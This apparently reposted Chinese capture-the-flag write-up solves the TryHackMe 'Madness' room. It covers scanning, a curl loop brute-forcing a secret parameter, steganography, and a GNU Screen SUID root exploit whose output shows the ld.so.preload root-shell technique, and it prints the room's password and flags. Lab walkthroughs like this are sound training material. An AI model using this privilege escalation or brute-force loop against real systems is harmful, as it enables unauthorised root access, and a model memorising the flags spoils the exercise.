高防服务器
  • 电 话:400-808-5836
  • MSN :huad@live.com
  • 客服QQ:4698328 9291215
  • 咨询邮箱:sales@fobhost.com
  • 售后:services@fobhost.com
  • 网 址:https://www.gaofangfuwuqi.cn/
    • 首页 新闻资讯 新闻资讯 【Tryhackme】Madness(图片隐写,SUID提权:screen)

    【Tryhackme】Madness(图片隐写,SUID提权:screen)

    服务发现

    ┌──(root?kali)-[~/tryhackme/Madness] └─# nmap -sV -Pn 10.10.123.91           Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-27 23:19 EDT Nmap scan report for 10.10.123.91 Host is up (0.35s latency). Not shown: 998 closed ports PORT   STATE SERVICE VERSION 22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds

    目录爆破

    ┌──(root?kali)-[~/dirsearch] └─# python3 dirsearch.py -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -e* -t 100 -u http://10.10.123.91   _|. _ _  _  _  _ _|_    v0.3.8 (_||| _) (/_(_|| (_| )  Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521  Error Log: /root/dirsearch/logs/errors-21-09-27_23-20-38.log  Target: http://10.10.123.91  [23:20:39] Starting:  [23:20:40] 200 -   11KB - / [23:26:05] 403 -  278B  - /server-status

    主页分析

    没有任何目录,只有一个首页
    网页源代码里有一行注释

    They will never find me

    上面代码指向一张不能打开的图片,地址是http://10.10.123.91/thm.jpg

    把图片下载到本地分析

    用exiftool分析文件,发现按照文件分析这本来是一个png文件,但是却以jpg作为后缀

    ┌──(root?kali)-[~/tryhackme/Madness] └─# exiftool thm.jpg ExifTool Version Number         : 12.16 File Name                       : thm.jpg Directory                       : . File Size                       : 22 KiB File Modification Date/Time     : 2021:09:27 23:56:02-04:00 File Access Date/Time           : 2021:09:27 23:56:02-04:00 File Inode Change Date/Time     : 2021:09:27 23:56:02-04:00 File Permissions                : rw-r--r-- File Type                       : PNG File Type Extension             : png MIME Type                       : image/png Warning                         : PNG image did not start with IHDR

    查看图片源,文件头声明是PNG

    ┌──(root?kali)-[~/tryhackme/Madness] └─# head thm.jpg �PNG ▒ ��C   ▒▒��C �����  ���}!1AQa"q2��#B��R��$3br� ▒▒%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz���������������������������������������������������������������������������  ���w!1AQaq"2B����       #3R�br� $4�%�▒▒&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������

    用sublime打开thm.jpg文件,把
    8950 4e47 0d0a 1a0a 0000 0001

    改成

    ffd8 ffe0 0010 4a46 4946 0001

    然后保存。再打开thm.jpg文件,图片可以正常显示,根据图片提示

    hidden directory /th1s_1s_h1dd3n

    打开http://10.10.123.91/th1s_1s_h1dd3n/
    显示:

    Welcome! I have been expecting you!
    To obtain my identity you need to guess my secret!
    Secret Entered:
    That is wrong! Get outta here!

    查看网页源代码,有一行注释

    It’s between 0-99 but I don’t think anyone will look here

    我们在网页上加上一个secret参数:http://10.10.123.91/th1s_1s_h1dd3n/?secret=0

    网页发送了变化:Secret Entered: 0

    编写一个bash脚本,遍历0~99的请求参数,把结果输出到answer.txt

    #!/bin/bash for i in {0..100} do      curl http://10.10.123.91/th1s_1s_h1dd3n/?secret=$i >> answer.txt done

    查阅answer.txt显示73返回不一样

    <html> <head>   <title>Hidden Directory</title>   <link href="stylesheet.css" rel="stylesheet" type="text/css"> </head> <body>   <div class="main"> <h2>Welcome! I have been expecting you!</h2> <p>To obtain my identity you need to guess my secret! </p> <!-- It's between 0-99 but I don't think anyone will look here-->  <p>Secret Entered: 73</p>  <p>Urgh, you got it right! But I won't tell you who I am! y2RPJ4QaPF!B</p>  </div> </body> </html>

    y2RPJ4QaPF!B像是一串加密的东西,起初以为是base64,但是解不出来。有“!”这种特殊符号也不会是用户名。所以可能是一个密码

    房间的提示,
    1,不要进行ssh爆破,
    2,用户名是一个something ROTten的东西

    所以现在就是还差一个用户名,而且这个用户名很恶心

    这里完全懵逼,以为是ssh的密码,一直在找用户名
    结果原来是图片隐写的密码

    ┌──(root?kali)-[~/tryhackme/Madness] └─# steghide extract -sf thm.jpg Enter passphrase:  wrote extracted data to "hidden.txt".                                                                                                                                                                                                                                              ┌──(root?kali)-[~/tryhackme/Madness] └─# cat hidden.txt  Fine you found the password!   Here's a username   wbxre  I didn't say I would make it easy for you!

    以为wbxre这个是一个用户名,结果这他妈原来是一个加密的字符串,加密算法是rot13
    惊不惊喜
    意不意外

    解密出来是:joker,参考这个网站&input=d2J4cmU)

    现在有了用户名和密码,以为终于可以登录ssh了,结果密码是错的

    结果是需要把房间的这个海报照片下载到本地,然后从海报中解析出密码

    wget https://i.imgur.com/5iW7kC8.jpg

    解析出隐藏文件

    ┌──(root?kali)-[~/tryhackme/Madness] └─# steghide extract -sf 5iW7kC8.jpg                                                                                                                                                                                                    1 ⨯ Enter passphrase:  wrote extracted data to "password.txt".                                                                                                                                                                                                                                              ┌──(root?kali)-[~/tryhackme/Madness] └─# cat password.txt     I didn't think you'd find me! Congratulations!  Here take my password  *axA&GF8dP

    真是骚到飞起!

    现在登录ssh,拿到user.txt

    ┌──(root?kali)-[~/tryhackme/Madness] └─# ssh joker@10.10.123.91           joker@10.10.123.91's password:  Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-170-generic x86_64)   * Documentation:  https://help.ubuntu.com  * Management:     https://landscape.canonical.com  * Support:        https://ubuntu.com/advantage   The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.  Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.  Last login: Sun Jan  5 18:51:33 2020 from 192.168.244.128 joker@ubuntu:~$ ls user.txt joker@ubuntu:~$ cat user.txt  THM{d5781e53b130efe2f94f9b0354a5e4ea} joker@ubuntu:~$

    提权

    传leapeas,枚举提权漏洞信息,发现screen 这个SUID可以提权

    提权攻击脚本见这里

    joker@ubuntu:/tmp$ ./exp.sh ~ gnu/screenroot ~ [+] First, we create our shell and library... /tmp/libhax.c: In function ‘dropshell’: /tmp/libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration]      chmod("/tmp/rootshell", 04755);      ^ /tmp/rootshell.c: In function ‘main’: /tmp/rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]      setuid(0);      ^ /tmp/rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]      setgid(0);      ^ /tmp/rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration]      seteuid(0);      ^ /tmp/rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration]      setegid(0);      ^ /tmp/rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration]      execvp("/bin/sh", NULL, NULL);      ^ [+] Now we create our /etc/ld.so.preload file... [+] Triggering... ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. [+] done! # id uid=0(root) gid=0(root) groups=0(root),1000(joker) # cat /root/root.txt THM{5ecd98aa66a6abb670184d7547c8124a} #

    [温馨提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。]

    [图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]